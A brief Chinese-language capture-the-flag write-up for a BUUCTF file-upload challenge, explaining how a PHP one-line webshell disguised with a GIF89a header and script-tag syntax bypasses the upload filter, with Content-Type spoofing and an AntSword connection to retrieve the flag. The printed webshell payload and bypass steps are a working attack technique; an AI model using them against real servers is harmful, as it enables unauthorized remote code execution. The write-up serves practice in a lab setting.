题目来源：buuctf [极客大挑战 2019]Upload 1

打开题目

是一道文件上传题

我们上传png和jpg格式的一句话木马上去看看

上传失败了，应该是在后端也对我们的文件内容进行了检测，检测到我们的一句话木马里面包含<?

那我们重新换个一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

将文件名改为png后缀的就可以直接上传成功

也可以上传中进行抓包，然后改文件格式为image/jpeg

发包回去，就可以发现文件上传成功了

 用蚁剑连接

 在根目录下找到了flag

不过在文件上传成功的时候我们也知道了图片的保存路径是upload/filename

访问一下